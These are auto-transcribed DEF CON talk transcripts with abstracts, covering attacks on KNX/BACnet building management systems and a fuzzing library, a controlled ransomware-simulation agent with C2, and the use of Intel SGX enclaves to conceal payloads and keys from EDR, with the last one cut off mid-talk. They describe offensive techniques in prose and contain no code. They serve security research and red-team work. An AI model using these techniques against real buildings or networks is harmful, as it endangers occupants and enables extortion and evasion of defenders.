the interface between the LAN and the field. So it's usually a device in an electric cabinet so it means that it's hardly reachable to physically but of course reachable from the LAN. And if you scan one of them you may notice that several services are running like first the usual stuff for administration most likely at least HTTP maybe SSH or any other. But you may also notice another port which is the building management system protocol service. What are they? As I said before field components communicate with each other using a field protocol. Some of them now have an IP layer which means that you can contact interface and field devices directly using the IP version of this protocol. The most common of such protocol being backnet and KNX. So what happens is that the operator will send a backnet IP or KNX.NET IP request to the interface which will interpret it and relay it to the field bus via a field backnet or field KANYs request. And today I want to focus on that part for several reasons. First because we already know the other services and you can at least expect some basic protections from the vendor which is not necessary true for the BMS protocol. And more importantly this protocol is a direct way to talk to devices. It's the best way to gather information and to run commands on the BMS. And finally they have the same flaws as many other industrial components. To not consider cybersecurity and a lot of implementation were written a long time ago and never updated since then. What do we have so far? So we have field devices and protocol that should not be exposed and we know that they are actually are and that we can reach them. Yeah, IP interface devices. We also know that there's this IP version of a field protocol no one has heard of before to do that. And finally we know that we can talk to devices directly using that IP version of a BMS protocol through that IP gateway. Yeah. What can we do with that? So in the next few slides I talk about two general attack scenarios on building management systems. The first one consisting in sending valid stuff on the IP interface using the BMS protocol. And the second one consisting in sending invalid stuff which is brilliant I know. So let's talk about the first one which is the most obvious one. Here we want to send legitimate commands to change the BMS behaviors. If we go back to the example from hackers we could for instance enable sprinklers which may or may not be fun depending on the situation. We could disable the fire detection which is not fun at all. In a trickier way we could also change thresholds. For instance by setting the smoke detector thresholds higher when an alert is triggered it may already be too late which is still not fun. Or you can just do whatever you want as long as it's allowed by the system and this is very important. And why can we do that? Because as I mentioned before these protocols do not cope with cybersecurity. There is no protection against replay or whatever and often no authentication or at least no authentication by default. So here is a small example. I did a few months ago. This is an HVAC system in a test environment which can be controlled with backnet. So I have no idea what's inside the backnet protocol but just by listening to the traffic and extracting the right frame I was able to make it unavailable. So this is a script I used. It just replays the command to turn the system off every one second and that's enough. And by doing this in a real environment this could have a really bad effect. For instance in a data center without the HVAC the servers would just cover it to death. Also in buildings made entirely of glass what happens if you turn the HVAC off. Also imagine in Vegas. And for the renewing part if it's turned off all the bad things would stay in the air which is really not suitable especially during a pandemic. So the other scenario is the unintended use of devices using these protocols. In scenario one we run legitimate commands and can only perform expected operations. Here we want to send malicious stuff and wait for something unexpected, most likely something you could exploit. And what makes it happen is of course the combination of securities issues and devices that we talked about previously. But it's even easier knowing that a lot of BMS IP interfaces run Linux-based operating systems. So here is an example of what you can do. For instance you can compromise an IP interface exposed on the internet. On the internet you could gain a foothold in the network and possibly keep it or move somewhere else on that network or do anything else on that network. An alternative to this scenario could be to use the BMS for network pivoting. For instance in industrial systems IT and OT networks should be segregated. They are not always segregated but at least they should be. So now imagine having a BMS that's connected to both. I'm not saying this is a common setting but it can definitely happen. So someone who has access to the IT and wants to move to the OT would probably consider compromising devices that are connected to both. So this is it for the scenario. Of course I didn't invent any of this. And if you want to know more about BMS in general there are already a few conferences and papers. Also there are already a few talks about BMS exploitation and among them I recommend the one by Jesus Molina at DEF CON22 which talks about abusing a KANIC system in a hotel and which is really good. Also there is already some work about advanced testing on backnet systems and research about attack detection and remediation on backnet. But as you can see this is really all about backnet so where is KANICS? Actually the scenario that we just went through can be applied to any building management system protocol that has an IP layer. So there is of course backnet but there is also KANICS and we don't know much about it from an offensive point of view. So in the context of everything that we've just seen we're going to focus on that protocol for the rest of the presentation. So let's talk about KANICS. So as you already know KANICS is a BMS protocol with an IP layer. It's mostly used in Europe and Asia whereas backnet is mostly used in the US. And of course like the other you can find it in all types of homes and buildings. For instance in my office the lights and shutters are operated by KANICS. So I'd just like to say a few words about its history because I think it's interesting to understand some choices they made about protocol. So basically it's a merge of free European field protocol standards that were used since the 80s and they were merged into KANICS in 1999. Then eight years later KANICS net IP was created and then the KANICS installation became reachable from the network. And then again six years later security came. The first KANICS net IP security extension came out. And finally it's important to note that this standard is only free since 2016 so that's only been five years which is not that long. But even with the specifications available they are still pretty hard to use and I'll get back to it later. There are a few external documentation and also a few research and work about KANICS security. But obviously that does not mean there is nothing to say about it. And actually there's a lot to say. But the standard got a bit covered. They say for KANICS security is a minor concern as any breach of security requires local access to the network. But that does not mean there is nothing about security in KANICS. Some vendors implement authentication not all of them but this is usually an option which is usually disabled by default. Also there are security protection. I mentioned extensions which are KANICS IP secure and KANICS data secure. But once again there are extensions, there are add-ons and you usually have to pay more or to get better devices to have them. So yeah security is optional. And about the devices exposed on showdown. I'm not saying that none of them use authentication or security extensions. But I'm just saying that most of them probably don't. But then the standard got that covered too. They say it is quite unlikely that legitimate users of a network would have the means to intercept, decipher and then tamper with a KANICS net IP without excessive study of the KANICS specifications. So this is what we call security by obscurity. And that's bad. So KANICS for my beer. So now let's get started. Let's start testing KANICS. The standard is right about one thing. The protocol is complicated. We have few resources and it's hard to start testing KANICS really. So at least now the specifications are free. And you just need an account on KANICS websites. But you also need good nerves because the specification is 148 PDF files in 10 sections with information spread everywhere. So you just don't know where to find what you need and you can grab as you need that's a nightmare. And most likely you only need the volume free. But it's still 33 PDF files with information spread everywhere again. And for instance if you're looking for how to build a request to send a value to an address you need at least four different PDF files. So we don't want to do that. And there's a better way to get things started. We could set up a test environment with three tools provided by the KANICS association. We could use KANICS virtual to emulate a KANICS environment that will combine with ETS which is the official engineering tool to configure KANICS environments. So you just set up that environment and then you just have to play with that while listening to the traffic and you'll learn a lot. And this is all virtual so no side effects here. And also Weirshark already has again a NetIP data sector which is really convenient. And also I have to say that the code for the data sector is way more understandable than the specifications. So I show you briefly how it looks like. I have a project configured in ETS with light and switches. I don't know that it took any virtual and we can see that if I click on buttons it turns on and off lights. So that's a very straightforward setup but that's already enough to learn a few things in a safe environment. And we can also run diagnostic on ETS and see what happens on Weirshark and so on. So just before we really start testing KANICS there are a few key concepts I like to mention because they are useful to fully understand what's going on. So when an operator pushes a configuration or sends a command a KANICS NetIP request is sent to the KANICS NetIP interface. This frame may contain only KANICS NetIP relevant information or it can embed raw KANICS data which is related to the KANICS layer. So this KANICS data are called KEMI for Common External Messaging Interface and there are independent KANICS messages with their own formats inside the KANICS NetIP request. So this means that they have their own headers, their own types, their own bodies and so on. So this also means that we don't have one protocol to test but two with different impacts depending on the one we target. Finally a few words about the topology. When you run the IP layer of course you use IP addresses but when you run the KANICS layer there are two types of addresses. The first one is individual addresses which are used to refer to the device and the other one is group addresses which refer more to functions. So it's not a collection of devices but more a collection of actions that devices can do. For instance we can imagine that the fire detector and the sprinkler subscribe to the same group address. And when there's a fire, the fire detector will set the value 1 to the group address associated to it and when that group address has the value 1 it just starts to sprinkle. So I know it's a bit hard to understand but it comes with practice trust me. And that's all we need to know for now and now we can really start testing. There are already a few tools that we can use to do that. First of course ETS. KANICS map is also a great tool if you want to discover devices and interact with them. So let me show you quickly. You can just use KANICS map to scan IP interfaces on the network. And you can see that we don't need to know much about KANICS to use KANICS map which is cool. We can see from where a lot of things happened. First we see that we need to send a KANICS request, an autonomic request with a KME and so on but we'll get back to it later. So we're at KANICS map but there's also the KANICS net IP layer for Skappi which was written by my colleague Julien Bedel. It's not yet on the release but it's at least merged to Skappi master so you can already use it. So thanks to Julien and thanks to Skappi maintenance for that. Both Skappi and KANICS map are suitable for basic interaction. However, when I wanted to start using them for my own tests I encountered some limitations. So first KANICS map is great if you don't know the protocol but I could not use it to craft invalid frames. I could not modify KANICS map code to autonomic requests without rewriting parts of it because they handle errors which is a good practice but for first thing we don't want that. For Skappi the opposite. You can't really use it if you don't know the protocol in details but you can definitely use it to craft invalid frames. However, they can become really complicated especially when they embeds KME frames and also IP interfaces are very strict usually regarding the format so when you fuzz you have to fuzz specific fields which can become really complicated and the syntax can be really tough. So obviously when nothing suits my need it's time to write a new tool. Now I'm going to talk about both which is a tool we wrote when I started using and testing KANICS net IP devices. Both is a Python 3 library that we wrote to discover, interact with and test devices that are the industrial network protocols. So I first created it for KANICS net IP but we can add other protocols. For instance we are currently adding mod-push support. So this is a library so it's most likely meant to write attack scripts to change devices behaviors or to test protocol implementation on devices. So if you recall the attack scenario I talked about earlier about sending valid frames to KANICS net IP devices, both has been written to do both. No joke. And if you want to take a look at it, it's available on the Born-Chibert-Defense GitHub. To be honest I wrote it for my own needs first and I use it to bring pen tests for a discovery and to send comments. But I also use it for vulnerability research on protocol implementations on devices. So I use both to write dump and not so dump further. I can save it as smart. And I'll give you an example of that soon. And the more I go further in my research, the more features I add in both to admit testing. So hopefully it's getting better and better. So before I show you how to use both for discovery and testing, just a quick information about both internals which I think is interesting. The first version of both relied on JSON files for protocol implementations because it was easy to add and change things in the protocol. But at one point we had too many limitations. So when I first presented both I was asked why not use CAPI? Which is actually a good question. And I was like, hmm, not that you mentioned that. So long story short, we ended up adding it to end of protocol implementations but internally there's a wrapper around it in both so that we don't lose some of both capabilities that were not compatible with CAPI's behaviors. However, we still let the user access the CAPI object directly within both if she wants. So if you want to know more about that, we detailed how and why we did that in the documentation. Now back to using both. As I mentioned before, both can be used for discovery, basic interaction and advanced testing. So there are three ways to use both. The first is the higher level one which requires no knowledge about the protocol. There are just some functions in the library that can be called to perform basic operations on KNX installations. So for instance, this is my test setup. Here we want to turn on this light and fan which are linked to a switching actuator. The actuator is linked to an IP gateway that makes it reachable from the local network and I'm on that local network. So I can communicate with it using KNX and IP. The actuator is subscribed to Group Address 111 for the light and fan switching operations, both of them. When it's switched off, the value is zero and when it's switched on, it's one. So if I write value one to Group Address 111 using the function group write, we can see that something happens. Then there's an intermediate usage which requires some basic knowledge about the protocol. For instance, you could do the same thing as in the previous example, but you can use this level to have more control on the exchange and the frames you sent. So for instance, if you want to do the same thing, as to say change a value on devices, this is what happens. We send a KNX net IP frame to initiate a tuneling connection to the KNX layer. We then send a tuneling request containing a raw KNX frame, a KAMI. Here it's L data rack, which will be extracted and relayed to the KNX layer. The server responds with an act and also with a confirmation KNX frame to which we reply with an act because at least my test server is upset if I don't. And yes, it's UDP. So using both, we'll just write a script that does exactly that. Here the tuneling request is just broken down so that you can see how it looks like, but there's also a direct method that can be called to initiate and send a request. The code actually looks like that. So let's try to switch everything on again. Success! If we use the group addresses that are attached to only one object in the KNX configuration, we can also turn on and off objects on their own. Oh, and also something went wrong when we were setting up the demo. So let me introduce you what I think is the first ever KNX Operated Gun. And the final level is the one used to build the other ones that can be used to change everything in a frame. See, and this is the part I use for fuzzing. Now I just show you how to start writing a fuzzer with both. We won't talk about the results because this is not another conference about how we fuzz something to find buffer overflows, although both can be used to do that. And KNX IP interface usually have Linux-based OS with services in C or overcompiled languages, so it's definitely something that can happen. But back to our fuzzer, here I choose to write another type of frames because fuzzing tuneling request just writes bad configuration to 10 devices, so that's not the best way to start, I guess. So I want to mutate a configuration request. This means that I am my base frame and I wrote a generator function that will set a random value to random fill in the same. I can just fuzz the whole frame because if the frame is not valid, it will be rejected by the IP interface before it's even processed. And here we don't want that because we are trying to cause errors while processing our frames. So I have to first mutate specific fields, not all of them, because some of them must remain valid for the request to be accepted. The rest of the code handles the exchange with a similar process as for the tuneling request with the hack and all. And it will send my mutated KNX IP frames. Some of them may trigger some unexpected behaviors which we would want to test more afterwards to investigate. So here we want to first know which field triggered a handled error to exclude them later from the final results. And we also want to know which fields triggered timeouts. That's to say frames that did not get an answer. That's the most interesting one for us. So let's run it on a test device. You can see on Wireshark that a lot of packets are being sent and received. At some point we already have some results. All of them are timeouts. And for each one of them I have the name of the field and the value that were mutated as well as a view of the complete frame. So the result we have shows that frames with some values in some fields did not get a response from the test device. So here we have six results. So this means that we have six potentially problematic fields that we will want to investigate. But at that point there's one question. How do we know if the device rejected the frame or crashed while processing it? And the answer is using all of these we don't. We could send an additional frame to check if the device just stopped responding. But even when the device keeps on responding that does not mean there was no crash. So the next thing to do is to add a debugger on the device and keep testing. But what do we expect to find then? So first of all we expect to have crashes. That's to say situations where what we sent is not handled correctly and that we can investigate to eventually exploit them. But depending on where the crash occurs it may have different meaning. If it's anywhere in the KNX-NetIP frame we can suspect that the service or any other software interpreting the frame crashed and that we can use it to possibly compromise the IP interface itself. But if there's an error in the KNX frame it can also be that it can also be on the KNX layer on the IP interface KNX layer but a crashed occur leading to the interface compromise. But it may also be on devices themselves. However it does never happen to me so far so I might even be lying to you right now. But investigating on this is exciting anyway. So it's time to wrap things up. We have seen that there's a lot of things to do on BMS and KNX security. What we have so far is environments that control important stuff but where security is a minor concern. So for now we don't need to go really deep into hacking techniques as there is no protection to bypass or a few of them. But even when there is can we consider that building management systems that use KNX are secure? So apart from just abusing such systems we can go further and there are a lot of research subjects left to work on here. For instance to find out what's really inside widely used implementations and what we can do with them or what's inside KNX security extensions or even how to secure BMS efficiently and how to make sure they are actually secure. Until then there are a few things that we can already do to make things better. So first a quick message to vendors and users. Stop assuming it's the others problem. You both have your part to do in it. So vendors please at least make sure that secure settings are default settings and users check both settings and segregate your network or at least don't expose your devices on internet. And for us we have a brand new attack surface so let's test it. Maybe someone will learn something. Just be careful when you do that and test in controlled environments. As for defenders lucky you you get a brand new defense surface. So that's all for me. I hope you enjoyed the presentation. Thank you for listening.
|
Building Management Systems control a myriad of devices such as lighting, shutters and HVAC. KNX (and by extension KNXnet/IP) is a common protocol used to interact with these BMS. However, the public's understanding and awareness is lacking, and effective tooling is scarce all while the BMS device market keeps on growing. The ability to craft arbitrary KNXnet/IP frames to interact with these often-insecure BMS provides an excellent opportunity in uncovering vulnerabilities in both the implementation of KNX as well as the protocol itself. From unpacking KNX at a lower level, to using a Python-based protocol crafting framework we developed to interact with KNXnet/IP implementations, in this talk we’ll go on a journey of discovering how BMS that implement KNXnet/IP work as well as how to interact with and fuzz them. After this talk you could also claim that “the pool on the roof has a leak”!
|
10.5446/54204 (DOI)
|
Hello, DevCon. Welcome to my talk, Rekiteer Prototyping Control Ransomware Operations. My name is Dimitriy Snashkov. I work at Partivity on Attack and Penetration Testing Team, where I have a chance to do tooling, offensive research, and automation. And today we're going to talk about ransomware. Specifically, we're going to talk about simulating the lifecycle of ransomware, injecting into it, understanding it, and emulating the steps that need to happen to properly test it. Our talk is going to be split in two phases. The first phase, we're going to talk about the problem, construction of a solution from architectural perspective. And then the second part of the talk is going to be the demo where we dive in how the operation happens, what makes the Rekiteer Toolkit tick. Let's start. So ransomware is definitely a technical issue. It's implemented in technology. But what fascinates me about ransomware is it's just such a good business model. It is just an efficient economic exit activity from cyber attack. Imagine that the bar of entry is low on the technical side and tooling is available. And encryption of the files, locking up the files can happen almost immediately once the dropper actually gets onto the box. So you don't really need, as a ransomware deployer, actually go to the second or third tier in the network, on the customer network. You can actually monetize right there and then. Also, all the features that the cost of deploying ransomware is much smaller than a lot of other cyber offenses. And with advent or actually use of crypto monetization activation path is fast, right? You can actually say that even the attribution is getting much more fragmented than before. And obviously, with such a business model, there's no wonder that ransomware has grown about 330% year over year growth. So if that's such a good business model, how do we emulate the testing for it? How do we inject into this? And how do we make sure we can actually trace what's going on, understand its capabilities and react to it? Well, traditionally, obviously, we need to contain, we need to keep on with preventative and detection controls because ransomware is just another variation of offensive on your network. You absolutely need to go across teams for disaster recovery drills, you know, do your instant response triage. And one more thing is to add external negotiation with ransomware party as part of your tabletop exercises. And so just like everything else, a lot of times you can detect or prevent things, you can actually minimize mean time between failures. And this is what Rekiteer tooling is attempting to do is achieve is essentially trying to emulate the path and the lifecycle of ransomware and allow the teams to kind of get in the middle of that. And the way you do this is obviously you need to know your assets and data that ransomware may target. And you need to perform simulation and feedback. And that simulation and feedback is what we're going to talk about. But before we move on, let's just distill the lifecycle of ransomware into three things literally is the persistence where the dropper actually executes the task on the assets, be it files or anything else. Then there is an extortion capability, which may or may not happen in sequence. You can have offline negotiation, you can have online kind of IOCs popped in that says, hey, you know, you have T minus 48 hours to pay us or else. And then from the ransomware perspective, there is a D stage or decryption capability that has to happen, and potentially clean up, right? If you if you care about leaving the network intact, not cause and deny of service. And so the objective of recitier tooling is to refine that process of injecting into this lifecycle to help teams on whatever side of the story, whether it's the tabletop to support the incident response and triage, whether it's providing optics into TTPs and actually do in collection of indicators of compromise they can, you know, that the teams can learn from. And, you know, obviously play towards the red team side where the objective is to implement the last mile delivery of ransomware in your objectives through your campaigns. Obviously, you know, for us as testing as testers, we have to abide by SLAs and it's good practice to keep the network intact, not deny, do not perform denial of service on it or cause denial of service. And so this is why we're calling our toolkit control prototype of ransomware, right? It's a controlled run where we have precise targets where you have kind of balance of stealth and openness. So you can both showcase the capability but also open it up to defenders to kind of inspect things. So if it is a ransomware simulation, what technical features does it need to have? Well, as we talked about before, we need to be correct and reliable in locking and unlocking assets because we want to make sure that the customer stays up, you know, real time encryption versus offline decryption of assets very useful because there are circumstances in ransomware campaigns where decryption and encryption happens separately or the agent dies and you should be able to bring the assets back into the unencrypted form as much as you can. Obviously, dormancy and activation, dropping the agent on the network does not mean it's going to get active and start encrypting things, right? We have to manage that. And because of that, we have to have flexibility in communications and specifying targets and all that good stuff. So let's just try to build one. What would be the good agent for our purposes? Well, let's just target Windows because it's the most prevalent kind of target for ransomware historically. Obviously, that can be adapted to Linux or go cross platform. But in this case, we're going to take a look at encrypting local files on Windows and also encrypting local files on Windows by going, you know, across the network, for example, you can remote into a different box through that agent and kind of do the encryption of assets there. And obviously we need to have control of execution as we mentioned before. The other technical features that we want to have in this agent is lifetime key management and key generation. Has to happen offline as far as generation because of, you know, both stealth and convenience, if you want to have offline capability to decrypt the assets, you should be able to do that. And then we work through policies, we load policies into the agent, the policies have to be flexible. They need to carry profiles with them as far as how you connect to the box, what user idea you're using, how do you shield credentials, all that good stuff. We mentioned offline asset recovery. And because of that, we actually have an operation on the hub and spoke model where a commander accepts the agent and then manages it there. So you know, from the construction of those features, what else? We have to have communication emulation how ransomware usually interacts, obviously encryption on transmission layer, but also application level message encryption for the agent. That's become very prevalent and we need to be able to kind of inject into that. You know, it operates on or emulates a ransomware that does rest communication that your pub sub type of deal where you come in ask for the test, a tax task, execute it, upload the results and whatnot, right? So everything is sort of distributed in this way. What else do we need to do? Well, we mentioned the policy, but it also needs to be hot patching. So we need to be able to encrypt the assets, but we also need to be able to back out from the same policy so we don't lose correlation of the keys. Again, real time or remote, whichever the case may be. If we are testing customers and we are soliciting for credentials, if we need to, need to, for example, impersonate a user to go to a remote box on the network, i.e. literally, literally move to it, we want to make sure we put security on credentials, right? We don't want clear text crass. So we're doing some encryption on, on, on that credential shielding, right? And then obviously, we need to be flexible in how authentication maps happen. If we are going from one domain to another domain for non domain to domain, we should be able to employ various profiles for connectivity on the network itself. So that plays to flexible operations. What else? We also want to have a mutual authentication between a C2 or commander, if you will, and the agent so that the agent knows who their C2 is at the time of deployment and creation. And also C2 wants to accept only the agents that it knows about. And so that kind of plays into the delivery options and how agents get triggered. Sometimes you hard code the policy into the agent to, let's say, get moving on air gap network without C2 interaction where you can drop in and you can, you can have an agent on the network and kind of start encrypting things right away without accepting tasks from C2. Or you can, you can go the old route where you dormant until activated, right? Some notes on stealth versus transparency. One of the problems in ransomware is not, not knowing what's going on once agents are deployed. So we want to make sure we know at all times what's going on. So we run logs on the agent, but those logs are in memory, and we're able to retrieve and kind of introspect, get some optics into what's going on. And then obviously, you know, one of the interesting features or needed features in our testing is to be able to kind of clean up after ourselves, calling the agent, popping up notifications that has been killed or, you know, whatever the case may be, removing the threat from the network on their own. So we've talked a lot about the policy. And so the policy is what ties everything together, right? You have flexible connectivity to C2s. You have profiles and connectivity. You've got authentication maps that match credential triplets to, to hosts that they go to on a domain or not. You also have flexibility on key generation and whether you're encrypting assets with one key per host, or you can have flexibility where you have separate keys for each file or mix thereof. You know, you can have situations where you can, you can kind of tier the priority on file, files if one keys are covered, the other one stays, stays kind of encrypted as well. So this brings us to a demo where we can talk about specifics of deployment and operations of Rekiteer toolkit. And we'll come back to discuss other things later. Let's take a look at the operations of Rekiteer. Here we have four windows. There's a C2. There's a utility box that helps manage encryption and master keys, site IDs, as well as decrypt, encrypted files offline. And on top there are two windows that represent simulated attack, attack network. There's a non-domain join machine, and there's a domain join machine. And so our task for Rekiteer is to go out and use the agent that gets deployed on the non-domain machine to manage, i.e., encrypt, the assets on it, and then pivot over to the domain box and do exactly that on the other side. So before we talk about the execution of it, we'll like to take a look at the policy file. So the policy file, as we've discussed, is the one that ties the tasks, communication, encryption keys, and authentication profiles for the agent as seen by the operator from the outside. And there are multiple sections to it. There's connectivity section with various profiles and security of communications. There is a REST profile and endpoints that needs to talk to. There are keys, such as master key, and identifier of the site for the agent. And there are also a series of authentication profiles that take the triplets, username, password, and domain, or operate on a local asset. And then there is an array of hosts and files that file connector or the agent is able to operate on, mixing and matching host keys with file keys. You can repeat these sections as many times as you would like to. This is very contained operations. And so in order for us to task the agent with execution, first we need to start the agent on the remote box, it starts up and we can see that it's running under PID 1940. Then what we can do, we can activate it. Right now it's an dependent state. Let's activate the agent. And what we're going to do is we're going to accept the agent to be as part of our communication, which means that we only accept the agents that are the ones that we know about. Then what we can do is we can authenticate the agent to the C2 and the C2 to the agent by specifying the master key you've created before. And so we can send the master key to the agent at which point it will know that it's talking to the C2 that it knows about and has been paired up with. And then what we can do, we can actually send the policy which we've specified before. This policy is going to encrypt the assets across the board. It will take a while for it to respond, usually within the profile that you've specified, five to 10 seconds or more. And as you can see, the agent actually operates on the assets locally and then goes out using the authentication profile to the domain and encrypting the assets on the other side. And as you can see, those assets are encrypted as we're going to see in the moment they are locked and the customer is kind of forced to operate under those conditions. The same thing happens here. But the other thing that we need to be able to do if we're not ready to decrypt offline is we're actually reversing the policy. And the reverse of the policy is just a matter of specifying the operations type flip a bit on encryption and decryption. And so what we're going to do, we're going to flip that policy back into into the into decryption mode. Same thing, Paul exec file, decryption, the same keys that you specified, or you can do one by one, decrypt one file, all the files, none of the files. This should work. And once it's once it decrypting the file, we will be able to see the content as it was there before. And essentially, everything should be back to normal. One other thing that I would like to mention is the execution profile in the memory. So we can, we can get the logs, looks at debug on the logs, which means that they will increase verbosity of the agent and we can do logs get on it. And we'll be able to see what it's doing there. And obviously, you know, to align with our directives of working with perhaps triage teams, what we can do, we can kick off a tabletop exercising by popping up a notification message on the agent, or on the on the host where the agent resides, that basically says, I am here, why don't you take and you know, start taking care of what I'm doing here. And we can do this with on hiding console message, which will basically lock the box, show the notification, and then the triage process happens. Now, obviously, less but not least is that we can agent self terminate to clean up after ourselves. This will stage the agent and it will be the box will be clean with all the assets intact. Or the variation on the theme is when agents are locked and the or the files are locked and the agent is no longer in memory. How do you recover your assets as you talk to the ransomware team and ransomware team by using the utilities and the utility box are able to use the keys that they've specified in the policy to decrypt files one by one, or all. This is Racketeer toolkit. Okay, we're back. So what can we do to what does it tell us? It tells us that we are able to kind of simulate the life cycle of controlled ransomware, right? We are able to maintain SLA and uptime on the network, try to deliver the last mile monetization model module for the teams that needed and kind of plug in into the response process, either to support it or kick it off. And also learn more about the ransomware and how you know the deficiencies are and capacity of it is. So for defenders, I think it's safe to say that let's not signature this tool, but do pay attention to behaviors because artifacts may be minimal, because it's all in memory, right? But TTPs still exist, the lateral movement, the sequential encryption of the files. So all of that is still present. So bottom line is that IOCs are tied to implementation. And the agent has been deliberately weakened to showcase the kind of the injection points and analysis points. And obviously, instrument your environments where you correlate operational performance and security messages. And with that, I want to thank everybody who's listened, looked at the demo, watched the demo rather. Here's the link to open source code for the Rekiteer. Thank you very much.
|
Offensive testing in organizations has shown a tremendous value for simulating controlled attacks. While cyber extortion may be one of the main high ROI end goals for the attacker, surprisingly few tools exist to simulate ransomware operations. Racketeer is one such tool. It is an offensive agent coupled with a C2 base, built to help teams to prototype and exercise a tightly controlled ransomware campaign. We walk through the design considerations and implementation of a ransomware implant which emulates logical steps taken to manage connectivity and asset encryption and decryption capabilities. We showcase flexible and actionable ways to prototype components of fully remote ransomware operation including key and data management, as well as data communication that is used in ransomware campaigns. Racketeer is equipped with practical safeguards for lights out operations, and can address the goals of keeping strict control of data and key management in its deployment, including target containment policy, safe credential management, and implementing operational security in simulated operations. Racketeer can help gain better optics into IoCs, and is helpful in providing detailed logs that can be used to study the behavior and execution artifacts of a ransomware agent.
|
10.5446/54205 (DOI)
|
Hello, Defcon. Welcome to your house as my house, use of offensive enclaves in adversarial operations. My name is Dimitriy Snashkov and I'm part of the Pertivity Attack and Penetration testing team where I have a chance to do tooling, offensive research and automation. Shout out to my team at Pertivity for making that happen. So today we're going to talk about SGS technology as it applies to offensive operations. Being part of the offensive team and tasked with testing, I sometimes find myself and we as a team find ourselves on unknown boxes and sometimes we need to leverage the technology that exists there to be able to withstand the onslaught of EDR inspections or defensive technology inspections. And so SGS technology here is was a curious case when a developer was using SGS technology to protect trusted credentials and so the box was instrumented with SGS enclaves which we thought why not use them and how can we use them to further our goals of bringing payloads and taking care of secure communication for us. But first things first, SGS technology developed by Intel Corporation to essentially protect specific code or data from disclosure or modification to adversarial parties. Adversarial parties defined by Intel or SGS technology is anybody who is running in non-ring three. For example, privileged system code, operating system, virtual hypervisor, managers, bios, all the things that kind of work around the hardware. And so SGS enclaves were born a technology that solved the issue of protecting areas or tries to solve the issue of protected areas of execution and increased security on platforms that are considered to be compromised from all the contacts that runs around them. So SGS as we've defined, SGS soundclaves is a trusted code and it's also linked into application. So the application kind of runs in two modes split personality modes, right? One is the untrusted part of the code and another is trusted part of the code. The trusted or safe part of the code runs in the SGS enclave which we construct and we interact with underlying bootstrapping and orchestration platform to be able to execute or reach into the trusted area and execute very specific operations from the untrusted memory which is our application. That's possible by SGS of introducing two new op codes of switching in and out of the trusted area over CPU which is locked to the enclave or enclave is encrypted by CPU key. And so this technology is very kind of prevalent in the high security environments. Obviously part of the, you know, wherever Intel core processor six plus generation lives on laptops, business, servers and data centers, but also in cloud virtual machines, namely we found it on Azure DC level trusted computing machines, right? And so if we find ourselves as operators on those machines, we might be able to use some of that protection for our purposes. So the offensive goals for us here is kind of twofold. First is understand the technology, how to construct the application so we can actually invoke, you know, SGS and use enclaves to store our data, which is payloads or other things. Also use SGS technology and SDK to try and secure communications with our C2 without revealing keys that we use for our payload encryption. And in the process, try to kind of, you know, have the EDR divert attention from us by splitting the kind of the deployment model between several components that are not fully assembled or inter in introspective. And so in this case, we're going to do Windows as an example, we're going to create an a system called Xclave or kind of, you know, design a method of communication between our cradle to load securely our payload store them in the enclave on the box, but also hide the algorithm of encryption and the keys that's kind of traveled back and forth the inclarate text. And so the Windows is the example in this case, but the Linux side will be pretty much the same in concepts, although implementation may be a little bit different. And hopefully we're going to have fun going through those exercises. One thing to mention is that this talk is not about SGS vulnerabilities, or SGS SGS deep dives, we're going to touch on some of the relevant parts, but refer to other great talks on the matter. The SGS components that will be interesting for us will be the platform software that gets installed to kind of interact with enclave. If if we're dropping into a box that has appropriate type of CPU, and we're on Windows Microsoft Windows machine, then operating system will would have already have the driver for it, because that's, you know, that's a standard update process for it. But you could obviously have more type of, you know, have other type of platform software if you're operating directly in the environment that as SGS enclaves are used by developers to kind of help their applications be more secure. So there's drivers there, and the orchestration software such as attestation service, which talks about and takes care of the kind of signing and verifying the enclaves themselves to the owner and to the system, i.e. the CPU. And also the second part is the SDK, which we will use as part of the software development to create this application, which will utilize enclaves. There are two SDKs, we're going to take a look at Intel for the most part, but open enclave is also available for our purposes. So the outcome of our efforts would be an application or a set of applications that will be created with trusted and untrusted parts, trusted being an SGAX enclave and untrusted being all the bootstrapping code that allows us to share information with our C2 and process payloads from that. And then we're going to go into how high level mapping of the calls into C2, into trusted area happens, and how we can leverage some of the primitives in the SGAX SDK for our purposes, such as configuration, signing, and loading. Specifically, the problem of payload transfer can be distilled to a few things. So first of all, we do not want to load payloads and clear, we also always want to protect. And commonly, we protect that with some X or key, maybe AES key. But the problem is that the key itself may be available in the memory, because it's shared key a lot of times. And so it's inspectable, if not real time in the sandbox, then in the forensic lab, right? And so if we're running long term campaign, we want to make sure we protect our keys in memory. And also the other thing is the algorithm itself can be reversed, and we can be, you know, pretty much our algorithm can be known, but not because we don't want to share the algorithm, but because that algorithm may point to weaknesses in our communication, which may be introspective and intercepted. And so what we're going to do, the other goal is not only to store payloads, but also use SGX to secure, communicate how to see to do that, there are a few alternatives. There are some crypto libraries that come with PSW, the platform code and SDK. It's SGXTS crypto, TC crypto library. It is fairly limited in what it does because its purpose is to facilitate jobs of attestation and communication for session management. It's not general purpose crypto, but we can use some parts of it to construct what we want. We can also bring third party to encryption to work with that, for example, open SSL or Wolf SSL library. But the problem is target availability. We do not know if these libraries runtime are going to be available on the target. Plus, we want to save way from loading things from disk as much as we can and operate in memory. And a lot of times it's too heavy or impossible to load those libraries in memory. And the third possibility is obviously with the limited kind of API that we have inside of the SGX SoundClave, the trusted area, we can roll our own, which is probably discouraged in this exercise anyway. And I mentioned limited access to API and SGX on Clave. The reason being is because it is itself, because of its kind of reason for existence to protect the code inside of it, is devoid of support for syscalls. And it has a very limited IO in and out of Enclave, mostly for state preservation, but nothing less. So let's see what we can do. We're going to take the first approach is actually using TC crypto and see what we can do, how we can build it. So upon research, we kind of came up with three different things that we can do with that crypto in SDK. We can generate an RSA key, actually pair a public and private key. We can actually sign something with our public key, and actually encrypt it with the public key and sign with private key. And we can actually use a routine that works on AS, symmetric keys to be able to encrypt something of a value inside and potentially transfer that something, that piece of code or data outside of the Enclave into untrusted area. And so the idea here would be for us to create an application where we do just that. The first step would be to generate RSA keys set inside of the trusted PRM inside of Enclave, give the public key out to our C2, have it stored there and then go to C2 and C2 would be able to generate the symmetric key, send it to us inside of the trusted PRM. We're going to store the symmetric key and then we're going to have a shared symmetric key without leaking it so we can kind of generate payload on the C2 side and then keep transferring it into our trusted PRM without having any inspection or being worried about the algorithm disclosure or payload disclosure or key disclosure. So it's a three-step process. First, we're generating public private keys, we're sending them to C2, C2 now has them, then encrypts a symmetric key, sends it to us, we store it in the trusted component which decrypts the key because it was encrypted with the RSA, which we already had from previous step. And then we just share the 